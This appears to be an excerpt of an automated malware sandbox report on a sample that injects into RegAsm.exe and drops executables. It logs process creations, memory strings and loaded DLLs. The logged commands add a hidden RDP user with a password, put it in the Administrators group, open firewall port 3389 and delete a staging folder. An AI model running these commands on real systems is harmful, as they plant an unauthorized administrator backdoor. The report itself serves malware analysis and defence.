Source: RegAsm.exe, 00000003.00000002.2893376211.0000000020568000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000003.00000002.2893376211.0000000020568000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BGDGHJEHJJ.exe "C:\ProgramData\BGDGHJEHJJ.exe"
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GIJEGDAKEH.exe "C:\ProgramData\GIJEGDAKEH.exe"
Source: C:\ProgramData\GIJEGDAKEH.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\GIJEGDAKEH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKJKEBGDHD.exe "C:\ProgramData\BKJKEBGDHD.exe"
Source: C:\ProgramData\BKJKEBGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\ProgramData\BKJKEBGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ECBGHCGCBKFI" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\ProgramData\BKJKEBGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_7fdfafe0 wpaeOjzjqF4B /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_7fdfafe0 wpaeOjzjqF4B /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_7fdfafe0 wpaeOjzjqF4B /add
Source: C:\ProgramData\BKJKEBGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add
Source: C:\ProgramData\BKJKEBGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\ProgramData\BKJKEBGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\ProgramData\BKJKEBGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" RDPUser_7fdfafe0 /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_7fdfafe0 /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_7fdfafe0 /add
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BGDGHJEHJJ.exe "C:\ProgramData\BGDGHJEHJJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GIJEGDAKEH.exe "C:\ProgramData\GIJEGDAKEH.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\BKJKEBGDHD.exe "C:\ProgramData\BKJKEBGDHD.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\ECBGHCGCBKFI" & exit	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\BKJKEBGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
Source: C:\ProgramData\BKJKEBGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net user RDPUser_7fdfafe0 wpaeOjzjqF4B /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_7fdfafe0 wpaeOjzjqF4B /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Remote Desktop Users" RDPUser_7fdfafe0 /add
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_7fdfafe0 /add
Source: C:\Windows\SysWOW64\net.exe	Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_7fdfafe0 /add

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\BGDGHJEHJJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\GIJEGDAKEH.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
